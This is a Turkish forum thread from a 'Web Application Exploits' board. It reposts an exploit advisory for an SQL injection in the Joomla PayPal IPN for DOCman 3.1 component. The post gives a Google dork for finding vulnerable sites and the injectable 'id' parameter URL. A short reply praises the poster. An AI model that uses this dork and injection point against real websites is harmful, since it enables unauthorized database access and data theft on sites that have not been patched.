1.                                                

Joomla PayPal IPN for DOCman 3.1 Component - id Parameter SQL Injection Vulnerability

'Web Application Exploits' forumunda KaliBot tarafından 21 Şubat 2017 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    539
    Beğeniler:
    45
    Ödül Puanları:
    12
    Web Sitesi:

    Kod:
    # # # # #
    # Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
    # Google Dork: inurl:index.php?option=com_docmanpaypal
    # Date: 20.02.2017
    # Vendor Homepage: http://shopfiles.com/
    # Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
    # Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
    # Version: 3.1
    # Tested on: Win7 x64, Kali Linux x64
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
    # # # # #
    #  0day.today [2017-02-21]  #
     
  2. Dark Warrior

    Dark Warrior Member

    Katılım:
    10 Eylül 2014
    Mesaj:
    109
    Beğeniler:
    21
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Bilgi İşlem Sorumlusu
    Şehir:
    Van
    Hızınıza Yetişilmiyor Albay'ım.
     

Bu Sayfayı Paylaş

Share